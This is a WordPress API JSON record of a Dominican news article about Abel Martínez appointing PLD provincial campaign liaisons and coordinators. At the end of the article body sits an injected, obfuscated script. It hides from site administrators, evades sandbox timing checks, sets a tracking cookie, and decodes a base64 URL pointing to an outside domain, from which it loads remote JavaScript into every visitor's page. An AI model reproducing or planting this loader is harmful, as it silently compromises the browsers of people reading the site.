{"id":13547,"date":"2023-01-23T11:10:10","date_gmt":"2023-01-23T15:10:10","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13547"},"modified":"2023-01-23T11:10:10","modified_gmt":"2023-01-23T15:10:10","slug":"abel-designa-enlaces-y-coordinadores-provinciales-de-campana","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13547","title":{"rendered":"Abel designa enlaces y coordinadores provinciales de campa\u00f1a"},"content":{"rendered":"<p>El aspirante presidencial del Partido de la Liberaci\u00f3n Dominicana (PLD) Abel Mart\u00ednez, contin\u00faa los trabajos de estructuraci\u00f3n de su proyecto presidencial, designando a dirigentes del Comit\u00e9 Pol\u00edtico y Comit\u00e9 Central, que tendr\u00e1n la responsabilidad de fortalecer organizar y fortalecer las estructuras de cara a las pr\u00f3ximas elecciones presidenciales.<\/p>\n<p>\u201cNo hay espacio para el descanso cuando el pa\u00eds necesita hoy m\u00e1s que nunca, de nuestro compromiso y trabajo incansable, tendente a garantizar que, a partir de 2024, la suerte de los dominicanos se encamine por senderos de bonanza, desarrollo e igualdad de oportunidades\u201d, explic\u00f3 Mart\u00ednez.<\/p>\n<p>De su lado, el coordinador general de campa\u00f1a de Abel Mart\u00ednez, el miembro del Comit\u00e9 Pol\u00edtico, Francisco Javier Garc\u00eda, imparti\u00f3 algunas instrucciones a los equipos designados, afirmando que \u201cel PLD es la maquinaria electoral m\u00e1s poderosa en la historia pol\u00edtica dominicana, y ustedes ser\u00e1n responsables de dinamizar, activar y encaminar toda esta gran estructura a nivel nacional\u201d.<\/p>\n<p>En ese sentido se dio a conocer la designaci\u00f3n de algunos de los enlaces provinciales del equipo nacional de campa\u00f1a, quienes son responsables de ejecutar las orientaciones, planes y estrategias de la campa\u00f1a presidencial, entre los que figuran, Yv\u00e1n Lorenzo, Azua; Juan Ilianov M\u00e9ndez, Bahoruco; Rafael Hidalgo, Barahona; Nelson S\u00e1nchez en Dajab\u00f3n; Tem\u00edstocles Mont\u00e1s, Duarte; Yomaira Medina, El\u00edas Pi\u00f1a; Kenia Lora, El Seibo y Aura Toribio, Espaillat.<\/p>\n<p>Igualmente, fue designada Thelma Eusebio en Hermanas Mirabal; Lu\u00eds Alberto Pel\u00e1ez, Independencia; Carlos Pared P\u00e9rez, La Altagracia; Winston Santos, La Romana; Jos\u00e9 Ram\u00f3n Peralta, La Vega; Alberto Perdomo, Hato Mayor; Humberto Salazar, Monse\u00f1or Nouel; Mayobanex Mart\u00ednez, Montecristi; Ram\u00f3n Pep\u00edn, Monte Plata; Fernando Ram\u00edrez, Pedernales; Felipe Romero, Peravia; Iris Guaba, Puerto Plata y Melvin Leonel P\u00e9rez, Saman\u00e1.<\/p>\n<p>Tambi\u00e9n fueron designados como enlaces, \u00c1ngel Est\u00e9vez, S\u00e1nchez Ram\u00edrez, Radham\u00e9s Camacho, San Crist\u00f3bal; F\u00e9lix Lajara, San Jos\u00e9 de Ocoa, Rub\u00e9n Dar\u00edo Cruz, San Juan; Horacio Mazara, San Pedro de Macor\u00eds, Melanio Paredes, Santiago; Maribel Acosta, Santiago Rodr\u00edguez; Alejandro Mont\u00e1s, Santo Domingo Norte; Rub\u00e9n Bichara, Santo Domingo Este; Geovanny Romero, Los Alcarrizos-Pedro Brand y Jhonny Pichardo, Valverde, entre otros nombramientos.<\/p>\n<p>Otras designaciones de coordinadores provinciales de campa\u00f1a<\/p>\n<p>Abel Mart\u00ednez tambi\u00e9n realiz\u00f3 las siguientes designaciones provinciales: en Montecristi, Juan Alexander Rivas Rosado, coordinador de campa\u00f1a, Miguel Tito Bejar\u00e1n, coordinador operativo y Heinz Vieluf Cabrera, coordinador de estrategia.<\/p>\n<p>En Espaillat, los dirigentes Winston Ram\u00f3n Juma Polanco, Manuel Antonio Rojas y Ram\u00f3n No\u00e9 Camacho, son los coordinadores de campa\u00f1a, operativo y de estrategia, respectivamente, mientras que, en ese mismo orden en Dajab\u00f3n figuran Gregorio Mar\u00eda Reyes (Goyo), Olgo Fern\u00e1ndez y Sonia Mateo.<\/p>\n<p>En La Vega, las designaciones realizadas por Abel Mart\u00ednez, indican que, Bol\u00edvar Marte es el coordinador provincial, mientras que, Jos\u00e9 Orlando de la Cruz y Julio C\u00e9sar Correa, encabezan la coordinaci\u00f3n operativa y de estrategia, respectivamente.<\/p>\n<p>En tanto que en Hermanas Mirabal fueron designados, Carlos Jos\u00e9 Cepeda, Pablo de la Cruz y Lu\u00eds Rene Canaan Rojas, coordinadores de campa\u00f1a, operativo y estrategia, respectivamente, mientras afirman que seguir\u00e1n confirmando en los pr\u00f3ximos d\u00edas, los dem\u00e1s componentes del equipo nacional de campa\u00f1a de Abel Mart\u00ednez en las diferentes demarcaciones pendientes.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El aspirante presidencial del Partido de la Liberaci\u00f3n Dominicana (PLD) Abel Mart\u00ednez, contin\u00faa los trabajos de estructuraci\u00f3n de su proyecto presidencial, designando a dirigentes del Comit\u00e9 Pol\u00edtico y Comit\u00e9 Central, que tendr\u00e1n la responsabilidad de fortalecer organizar y fortalecer las estructuras de cara a las pr\u00f3ximas elecciones presidenciales. \u201cNo hay espacio para el descanso cuando [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13549,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13547","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13547","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13547"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13547\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13549"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13547"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13547"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13547"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}